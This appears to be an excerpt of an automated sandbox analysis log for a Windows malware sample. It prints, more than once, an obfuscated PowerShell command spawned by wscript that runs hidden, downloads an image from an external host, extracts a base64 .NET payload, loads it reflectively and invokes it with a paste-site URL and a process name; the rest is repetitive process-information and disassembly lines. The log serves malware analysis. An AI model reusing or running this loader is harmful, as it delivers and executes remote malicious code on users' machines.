            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwgPSAnKyd7MCcrJ31odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8nKycyMDI0MTAvRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSAnKydOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQuRG93bmxvYWREYXRhKHsxfWltYWdlVXInKydsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmcnKyddOjpVVEY4LkdldFN0cmluZygnKyd7MX1pbWFnZUJ5dGVzKTsnKyd7MX1zdGFydEZsYWcnKycgPSB7MH08JysnPEJBU0U2NF9TVEEnKydSVD4+ezAnKyd9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnsnKycwfTt7MX1zdCcrJ2FydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9ICcrJ3sxfWltYWdlVGV4dC5JbmRleE9mKHsxfScrJ2VuZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zJysndGFydEluZGV4O3sxfScrJ2JhJysncycrJ2U2NENvbW0nKydhbmQgPSB7MX1pbWFnZVRleHQuUycrJ3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dCcrJ2VzJysnID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbCcrJ2VjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfScrJyk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udScrJ2xsLCBAKHswfTAvMkdmMkEvZC9lZS5ldHNhcC8vOnNwdHRoezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MCcrJ31kZScrJ3NhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH0xezB9LCB7MH1hcHBpZHRlbHswfSkpOycpIC1mW0NIQVJdMzksW0NIQVJdMzYpfC4oIChbc3RyaU5nXSR2ZVJCb3NlUHJFZkVyZW5jRSlbMSwzXSsneCctSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/DetahNote_V.jpg {0};{1}webClient = '+'New-Object System.Net.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding'+']::UTF8.GetString('+'{1}imageBytes);'+'{1}startFlag'+' = {0}<'+'<BASE64_STA'+'RT>>{0'+'};{1}endFlag = {0}<<BASE64_END>>{'+'0};{1}st'+'artIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = '+'{1}imageText.IndexOf({1}'+'endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}s'+'tartIndex;{1}'+'ba'+'s'+'e64Comm'+'and = {1}imageText.S'+'ubstring({1}startIndex, {1}base64Length);{1}commandByt'+'es'+' = [System.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Refl'+'ection.Assemb'+'ly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0}'+');{1}vaiMethod.Invoke({1}nu'+'ll, @({0}0/2Gf2A/d/ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[CHAR]39,[CHAR]36)|.( ([striNg]$veRBosePrEfErencE)[1,3]+'x'-JoiN'')"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwgPSAnKyd7MCcrJ31odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8nKycyMDI0MTAvRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSAnKydOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQuRG93bmxvYWREYXRhKHsxfWltYWdlVXInKydsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmcnKyddOjpVVEY4LkdldFN0cmluZygnKyd7MX1pbWFnZUJ5dGVzKTsnKyd7MX1zdGFydEZsYWcnKycgPSB7MH08JysnPEJBU0U2NF9TVEEnKydSVD4+ezAnKyd9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnsnKycwfTt7MX1zdCcrJ2FydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9ICcrJ3sxfWltYWdlVGV4dC5JbmRleE9mKHsxfScrJ2VuZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zJysndGFydEluZGV4O3sxfScrJ2JhJysncycrJ2U2NENvbW0nKydhbmQgPSB7MX1pbWFnZVRleHQuUycrJ3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dCcrJ2VzJysnID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbCcrJ2VjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfScrJyk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udScrJ2xsLCBAKHswfTAvMkdmMkEvZC9lZS5ldHNhcC8vOnNwdHRoezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MCcrJ31kZScrJ3NhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH0xezB9LCB7MH1hcHBpZHRlbHswfSkpOycpIC1mW0NIQVJdMzksW0NIQVJdMzYpfC4oIChbc3RyaU5nXSR2ZVJCb3NlUHJFZkVyZW5jRSlbMSwzXSsneCctSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/DetahNote_V.jpg {0};{1}webClient = '+'New-Object System.Net.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding'+']::UTF8.GetString('+'{1}imageBytes);'+'{1}startFlag'+' = {0}<'+'<BASE64_STA'+'RT>>{0'+'};{1}endFlag = {0}<<BASE64_END>>{'+'0};{1}st'+'artIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = '+'{1}imageText.IndexOf({1}'+'endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}s'+'tartIndex;{1}'+'ba'+'s'+'e64Comm'+'and = {1}imageText.S'+'ubstring({1}startIndex, {1}base64Length);{1}commandByt'+'es'+' = [System.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Refl'+'ection.Assemb'+'ly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0}'+');{1}vaiMethod.Invoke({1}nu'+'ll, @({0}0/2Gf2A/d/ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[CHAR]39,[CHAR]36)|.( ([striNg]$veRBosePrEfErencE)[1,3]+'x'-JoiN'')"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB49FE4FF3 push eax; retf 5_2_00007FFB49FE4FE9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB49FD08CD push E95B7C1Ch; ret 8_2_00007FFB49FD0909
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_004190B6 push esi; ret 11_2_004190B9
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0041AAB9 push esp; retf 11_2_0041AB04
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_004123D8 push edi; retf 11_2_004123EF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_004123E3 push edi; retf 11_2_004123EF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_004023B0 push esi; iretd 11_2_004023BA
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0040AC63 push edi; retf 11_2_0040AC73
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_004074B7 pushfd ; iretd 11_2_004074B9
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_0041F4BF push es; iretd 11_2_0041F4CF
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_00412549 push ebx; iretd 11_2_0041254A
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_00403590 push eax; ret 11_2_00403592
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_00411E28 push ebx; retf 11_2_00411E2D
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_00406685 push FFFFFFCBh; retf 11_2_0040668C
            Source: C:\Windows\SysWOW64\appidtel.exeCode function: 11_2_034009AD push ecx; mov dword ptr [esp], ecx11_2_034009B6
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
